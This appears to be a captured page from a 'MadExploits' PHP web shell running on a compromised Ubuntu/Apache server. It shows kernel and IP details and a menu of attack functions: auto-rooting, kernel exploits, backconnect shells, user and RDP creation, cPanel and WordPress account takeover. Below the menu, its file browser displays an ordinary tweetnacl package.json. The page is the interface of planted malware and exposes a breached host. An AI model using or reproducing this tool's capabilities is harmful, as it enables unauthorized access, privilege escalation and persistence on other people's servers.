Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.253.142
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
tweetnacl /
[ HOME SHELL ]
Name
Size
Permission
Action
nacl-fast.js
60.31
KB
-rw-r--r--
nacl-fast.min.js
40.5
KB
-rw-r--r--
nacl.d.ts
3.03
KB
-rw-r--r--
nacl.js
31.69
KB
-rw-r--r--
nacl.min.js
24.2
KB
-rw-r--r--
package.json
1.58
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "tweetnacl", "version": "1.0.1", "description": "Port of TweetNaCl cryptographic library to JavaScript", "main": "nacl-fast.js", "types": "nacl.d.ts", "directories": { "test": "test" }, "scripts": { "build": "uglifyjs nacl.js -c -m -o nacl.min.js && uglifyjs nacl-fast.js -c -m -o nacl-fast.min.js", "test-node": "tape test/*.js | faucet", "test-node-all": "make -C test/c && tape test/*.js test/c/*.js | faucet", "build-test-browser": "browserify test/browser/init.js test/*.js | uglifyjs -c -m -o test/browser/_bundle.js 2>/dev/null && browserify test/browser/init.js test/*.quick.js | uglifyjs -c -m -o test/browser/_bundle-quick.js 2>/dev/null", "test": "npm run test-node-all", "bench": "node test/benchmark/bench.js", "lint": "eslint nacl.js nacl-fast.js test/*.js test/benchmark/*.js" }, "repository": { "type": "git", "url": "https://github.com/dchest/tweetnacl-js.git" }, "keywords": [ "crypto", "cryptography", "curve25519", "ed25519", "encrypt", "hash", "key", "nacl", "poly1305", "public", "salsa20", "signatures" ], "author": "TweetNaCl-js contributors", "license": "Unlicense", "bugs": { "url": "https://github.com/dchest/tweetnacl-js/issues" }, "homepage": "https://tweetnacl.js.org", "devDependencies": { "browserify": "^13.1.1", "eslint": "^3.12.1", "faucet": "^0.0.1", "tap-browser-color": "^0.1.2", "tape": "^4.6.3", "tweetnacl-util": "^0.13.5", "uglify-js": "^2.7.5" }, "browser": { "buffer": false, "crypto": false } }
Close